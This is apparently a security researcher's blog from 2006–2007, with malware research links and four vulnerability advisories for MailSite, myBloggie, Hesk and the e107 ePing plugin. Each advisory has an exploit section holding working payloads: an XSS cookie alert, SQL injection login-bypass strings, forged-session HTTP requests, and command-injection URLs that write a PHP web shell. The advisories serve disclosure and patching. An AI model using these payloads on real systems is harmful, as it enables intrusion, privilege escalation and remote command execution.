News from the Lab

ClubHack 2007: Analysis of Adversarial Code – The Role of Malware Kits

Just came back from Pune after Presenting at ClubHack 2007. It was such a great initiative to promote security awareness in India. I talked about the recent trend in the emergence of kits like MPack and how attackers are exploiting them to install various Malware. You can find my slides below:

ClubHack 2007

Advertisements

December 10, 2007 Posted by | Exploits, Malware Research, Technical Papers, Vulnerability Research | | 1 Comment

AntiSpyStorm: Fake Microsoft AntiSpyware Center pushing Adware !

Another blog which highlights the new-age social engineering techniques to spoof a user into installing adwares and spywares.

More here:

http://www.avertlabs.com/research/blog/index.php/2007/10/11/

October 14, 2007 Posted by | Malware Research, My Blogs | Leave a comment

SharK2: Trojan Creation Made Easy!

This blog talks about Shark2 DIY kit and how the remote access trojans has evolved from infamous Back Orifice to the recent RATS with stealth and virtual machine detection features along with the advancement in user-friendly GUI’s.

More here:

http://www.avertlabs.com/research/blog/index.php/2007/08/21/shark2-trojan-creation-made-easy/

October 13, 2007 Posted by | Malware Research, My Blogs | Leave a comment

The Nduja Job: Into The World Of XSS Worms

In this blog i talk about the history of  XSS worms, how they evolved to spread through multiple webmail providers and the client-server model involved in a XSS botnet.

More here:

http://www.avertlabs.com/research/blog/index.php/2007/07/19/the-nduja-job-into-the-world-of-xss-worms/

October 13, 2007 Posted by | Malware Research, My Blogs | Leave a comment

Hacking the Malware– A reverse-engineer’s analysis

ABSTRACT

This paper attempts to document an approach on how the hackers make use of the vulnerabilities to install malicious software on the vulnerable machine. A comprehensive reverse code engineered analysis of the malicious software (Win32.Qucan.a) and the various protection schemes against the worm by various security products are also discussed.

I hope this document will help the Malware researchers, Intrusion Analysts and other Security professionals to conduct a more viable and comprehensive research.

The complete paper can be downloaded from
http://geocities.com/rahulmohandas/hacking_the_malware.pdf

MD5: F875DADCAD00792D753CC96BD57E0F72

or

http://websamba.com/forever_rahul/hacking_the_malware.zip
MD5(zip file): 5562F1A86DDC447A14D7763FF4C8D85D

October 16, 2006 Posted by | Exploits, Malware Research, Technical Papers, Vulnerability Research | 1 Comment

RockLiffe MailSite wconsole.dll Denial of Service/Script Injection Vulnerability

OS2A ID: OS2A_1004 Status
01/06/2006 Issue Discovered
01/06/2006 Reported to the vendor
01/19/2006 Patch Released
01/20/2006 Advisory Released

Class: Denial of Service / Script Injection Severity: CRITICAL

Overview:
Rockliffe’s MailSite is a program for providing access to email
accounts on Microsoft Windows operating systems. MailSite HTTP Mail management
agent could allow a remote attacker to cause a denial of service or
execute arbitrary script code.

Description:
1. MailSite HTTP Mail management agent 7.0.3.1 version could allow a remote
attacker cause a denial of service. A bug in the input validation routine
in httpma causes the svchost process to consume more CPU cycles thus
impacting Mailsite HTTP Management agent and ultimately crashing the service.

2. MailSite HTTP Mail management agent 6.x and 5.x could allow a remote
attacker to inject arbitrary script code. This vulnerability is caused
due to a design error in the wconsole.dll. This dll file contains html
code embedded in it which is not properly sanitizing the user-input.

Impact:
1. Remote attackers can exploit this issue to trigger a denial of service
condition.
2. An attacker may leverage this issue to have arbitrary script code
executed in the browser in the context of the affected site.

Affected Software(s):
MailSite 7.0.3.1 and prior
MailSite 6.1.22 and prior
MailSite 5.x

Affected platform(s):
Windows (Any)

Exploit/Proof of Concept:
For 7.x series
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?Authenticate|cmd
Any special characters passed to the parameters in the wconsole.dll
triggers denial of service.

For 6.x & 5.x series
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?%3Cscript%3Ealert
(document.cookie)%3C/script%3E

Solution:
For 7.x series apply the following patch.
ftp://ftp.rockliffe.com/MailSite/Latest/Hotfixes/
For 6.x series apply the following patch
ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/

Reference:
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0750.html

January 11, 2006 Posted by | Exploits, Vulnerability Research | Leave a comment

myBloggie SQL Injection/Privilege Escalation Vulnerability

OS2A ID: OS2A_1002

Status
9/1/2005 Issue Discovered
9/2/2005 Reported to the vendor
9/3/2005 Patch Released
9/5/2005 Advisory Released

Class: SQL Injection Severity: CRITICAL

Overview:
myBloggie is a Weblog system built using PHP & mySQL. myBloggie
versions2.1.3-beta and prior are vulnerable to SQL injection vulnerability
causedby improper validation of user-supplied inputs. This vulnerability
can be exploited to bypass authentication mechanism, escalate the
privileges toadministrator level and also made to reveal system
specific information.

Description:
User supplied credential inputs (‘$username’ and ‘$passwd’) are not
sanitized in login.php before subjecting them to SQL query.

<——————-login.php snippet—————————–>

if (isset($_POST[‘username’])) {
$username=$_POST[‘username’];
} else $username=””;

$result = mysql_query( “SELECT user FROM “.USER_TBL.” WHERE user=
‘$username’ AND password=’$passwd'” ) or error( mysql_error() );

<—————————————————————–>

This can be exploited in multiple ways,
1. Authentication Bypass
A malicious user can log on to the weblog system without submitting
thepassword by placing queries such as this “admin’ OR ‘x’=’x” in
the User Name field.

2. Privilege Escalation.
When a non-administrative user submits, for example “user1’ OR ‘x’=’x”
into the User Name field, administrative privileges will be granted.

3. Path Disclosure.
Path information can be made to disclose in error pages by passing
invalid query to User Name field of login.php.

Impact:
Successful exploitation can result in a compromise of the application,
disclosure of system specific information, or permit an attacker to
exploit vulnerabilities in the underlying database implementation.
An attacker can also exploit this vulnerability to elevate privileges
within the affected system.

Affected Systems:
myBloggie 2.1.3-beta and prior.
Linux (Any), Unix (Any), Windows (Any)

Exploit:
1. POST http://example.com/mybloggie/login.php?username=admin&#8217; OR
‘x’=’x
2. POST http://example.com/mybloggie/login.php?username=normal_user
‘ OR ‘one’=’one
3. POST http://example.com/mybloggie/login.php?username=’1=1

Solution:
Patch: http://mywebland.com/forums/showtopic.php?t=399

Reference:
http://marc.theaimsgroup.com/?l=bugtraq&m=112607358831963&w=2

January 11, 2006 Posted by | Exploits, General Chatter, Vulnerability Research | Leave a comment

Hesk Session ID Validation Vulnerability

OS2A ID: OS2A_1003 Status
9/13/2005 Issue Discovered
9/14/2005 Reported to the vendor
9/18/2005 Patch Released
9/20/2005 Advisory Released

Class: Authentication Bypass Severity: CRITICAL

Overview:
Hesk is a PHP based help desk software that runs with a MySQL database.
It allows to setup a ticket based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path
disclosure vulnerabilities caused due to improper validation of the HTTP
header. This vulnerability can be exploited to bypass authentication
mechanism, and also made to reveal system specific information.

Description:
Multiple vulnerabilities exist in Hesk ticket based support system.

1. Authentication Bypass
The ‘PHPSESSID’, Session ID parameter in the HTTP header is not properly
validated. A malicious user can log in to the Administrator account by
sending a random value to ‘PHPSESSID’ parameter and posting it to
admin.php. This Session ID can then be utilized to access administrative
control panel.

This is similar to a previously reported vulnerability where invalid
User ID and Password were submitted. In this case, a randomly chosen
Session ID is sent along with the login request.

2. Path Disclosure.
Path information can be made to disclose in error pages by passing invalid
metacharacters such as “‘” or “<” to ‘PHPSESSID’ field of the HTTP header.

Impact:
Successful exploitation can result in a compromise of the application,
disclosure of system specific information.

Affected Systems:
Hesk 0.93 and prior.
Linux (Any), Unix (Any), Windows (Any)

Exploit:
1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
(“Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://host_ip/hesk/admin.php
Cookie: PHPSESSID=12345
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login”);

2. GET request to administrative control panel:
GET admin_main.php +
(“Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345”)
Solution:
Patch:
http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
OR Hesk 0.93.1 from
http://www.phpjunkyard.com/free-helpdesk-software.php

Reference:

http://seclists.org/bugtraq/2005/Sep/0242.html

January 11, 2006 Posted by | Exploits, Vulnerability Research | Leave a comment

ePing Arbitrary File CreationCommand Execution Vulnerability

OS2A ID: OS2A_1001 Status Published: 08/04/2005
Updated : 08/05/2005
Patch Released

Class: File Creation/Command Execution
Severity: CRITICAL

Overview:
ePing is a ping utility plugin for e107, a PHP-based content
management system that uses a MySQL backend database. ePing
versions 1.02 and prior are vulnerable to a file creation
vulnerability caused by improper validation of user-supplied
input in the doping.php script. A remote attacker exploiting
this vulnerability could then create an arbitrary file in the
webserver, pipe multiple system commands in the eping_host
or the eping_count parameters of the doping.php script, which
would be executed within the security context of the hosting
site.

eTrace, another utility plugin for e107 has similar
vulnerabilities.

Description:
e107 portal’s eping plugin 1.02 and prior is prone to remote
command execution vulnerability. This vulnerability exists
due to output redirection operators like ‘>’, ‘|’, ‘&’ are
not being sanitized in eping_host,eping_count parameters in
the doping.php script.

eping_host has a validate function in functions.php which does
not consider the above mentioned case.

eping_count has no validation logic. It accepts the above
mentioned system meaningful characters.

Impact:
A remote user can execute any command using ‘|’ character or
create a file with malicious executable code with ‘>’ character.
Execution of arbitrary command or creation of arbitrary files
can lead to, Denial of service, Disclosure or modification of
system information or Execution of arbitrary code.

Affected Systems:
ePing version 1.02 and prior
Linux (Any), Unix (Any), Windows (Any)

Exploit:

a.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping
%20-n&eping_host=127.0.0.1&eping_count=2%20%22%3C?php%20system(%94cmd
.exe%94)?%3E%22%20%3Etest.php

b.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping
%20-n&eping_host=127.0.0.1&eping_count=2|dir

Solution:
Patch:
Upgrade to the version 1.03 of ePing and eTrace plugins.

Reference:
http://marc.theaimsgroup.com/?l=bugtraq&m=112328161319148&w=2

January 11, 2006 Posted by | Exploits, Vulnerability Research | Leave a comment

My Blog

Welcome to my blog, guys !!!

This blog is a renovation of http://rahulmohandas.blogspot.com, its here to keep track of my interests in the security space…

Have a nice time….

Disclaimer: This is a personal blog written, edited, and published by and reflects the personal views of me, in my individual capacity. The views and opinions expressed here represent my own and not those of the people, institutions, or organizations that I may or may not be related with, unless stated explicitly.

January 11, 2006 Posted by | General Chatter | Leave a comment